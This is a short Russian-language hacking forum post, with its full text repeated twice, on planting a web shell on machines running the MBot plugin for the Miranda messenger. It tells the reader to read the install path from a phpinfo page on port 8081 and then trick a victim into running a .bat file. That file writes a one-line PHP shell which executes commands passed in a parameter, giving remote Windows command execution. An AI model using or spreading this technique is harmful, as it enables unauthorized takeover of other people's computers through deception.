Goudini
01.12.2006, 23:38
Получение шелла через MBot
Теория
MBot - сервисный плагин Миранды, позволяющий писать скрипты на PHP как плагины для Миранды. Он включает веб сервер на 8081 порту. В WWW каталоге размещаеться только 1 файл index.php с результатом работы phpinfo(). Толку нам от него мало. Вот если бы можно было писать в файл...
Практика
Получаеться когда включаеться Миранда, одновременно запускаеться веб-сервер. Если юзер об этом не знает можно попробовать получить веб-шелл на тачке.
Просмотрев файл index.php через браузер можно узнать путь к скрипту. Например D:/Miranda/MBot/WWW/index.php
Теперь нужно заставить жертву создать файл, который будет содержать шелл
Я сделал такой .bat файл
echo "<?='<pre>'.convert_cyr_string(htmlspecialchars(`$cmd`),'d', 'w').'</pre>'?>" > D:/Miranda/MBot/WWW/test.php
После запуска этого файла на удаллённом компе в веб-директории будет шелл, через который мы сможем выплонять команды винды. Он будет работать пока включена Миранда.
Теория
MBot - сервисный плагин Миранды, позволяющий писать скрипты на PHP как плагины для Миранды. Он включает веб сервер на 8081 порту. В WWW каталоге размещаеться только 1 файл index.php с результатом работы phpinfo(). Толку нам от него мало. Вот если бы можно было писать в файл...
Практика
Получаеться когда включаеться Миранда, одновременно запускаеться веб-сервер. Если юзер об этом не знает можно попробовать получить веб-шелл на тачке.
Просмотрев файл index.php через браузер можно узнать путь к скрипту. Например D:/Miranda/MBot/WWW/index.php
Теперь нужно заставить жертву создать файл, который будет содержать шелл
Я сделал такой .bat файл
echo "<?='<pre>'.convert_cyr_string(htmlspecialchars(`$cmd`),'d', 'w').'</pre>'?>" > D:/Miranda/MBot/WWW/test.php
После запуска этого файла на удаллённом компе в веб-директории будет шелл, через который мы сможем выплонять команды винды. Он будет работать пока включена Миранда.